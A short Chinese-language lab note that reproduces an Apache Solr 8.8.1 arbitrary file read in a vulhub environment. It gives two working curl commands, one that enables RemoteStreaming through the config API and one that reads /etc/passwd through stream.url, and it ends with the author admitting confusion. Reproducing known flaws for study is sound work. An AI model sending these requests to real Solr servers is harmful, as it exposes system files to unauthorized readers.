漏洞复现

启动的环境为8.8.1版本
首先，访问http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json获取数据库名，vulhub的数据库为demo：

发送如下数据包，修改数据库demo的配置，开启RemoteStreaming：

curl -i -s -k -X $'POST' \
    -H $'Content-Type: application/json' --data-binary $'{
    
      \"set-property\":{
    
      \"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
    $'http://your-ip:8983/solr/demo/config'

再通过stream.url读取任意文件：

curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

我没搞懂